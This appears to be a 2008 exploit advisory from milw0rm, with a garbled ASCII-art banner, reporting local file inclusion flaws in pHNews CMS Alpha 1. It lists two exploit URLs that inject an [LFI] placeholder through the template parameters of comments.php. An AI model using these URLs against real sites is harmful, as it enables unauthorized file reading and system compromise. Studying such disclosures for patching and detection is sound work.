pHNews CMS Multiple Local File Inclusion Vulnerabilitiesο»Ώββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ C r a C k E r ββ
ββ T H E C R A C K O F E T E R N A L M I G H T ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
βββββ From The Ashes and Dust Rises An Unimaginable crack.... βββββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ [ Local File Include ] ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
: Author : CraCkEr : : :
β Group : uNiTeD CraCkiNg ForCE β β β
β Script : pHNews CMS Alpha 1 β β Register Globals : β
β Download : SourceForge.net β β β
β Method : GET β β [β] ON [ ] OFF β
β Critical : High [ββββββββ] β β β
β Impact : System access β β β
β βββββββββββββββββββββββββββββββββββββ ββββββββββββββββββββββββββββββββββββ β
β DALnet #crackers ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
: :
β Release Notes: β
β βββββββββββββ β
β Typically used for remotely exploitable vulnerabilities that can lead to β
β system compromise. β
β β
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ Exploit URL's ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
http://localhost/path/modules/comments.php?templates_dir=[LFI]
http://localhost/path/modules/comments.php?template=[LFI]
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
Greets:
The_PitBull, Raz0r, iNs, Sad, CwG GeNiuS
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
ββ Β© CraCkEr 2008 ββ
ββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββββ
# milw0rm.com [2008-07-03]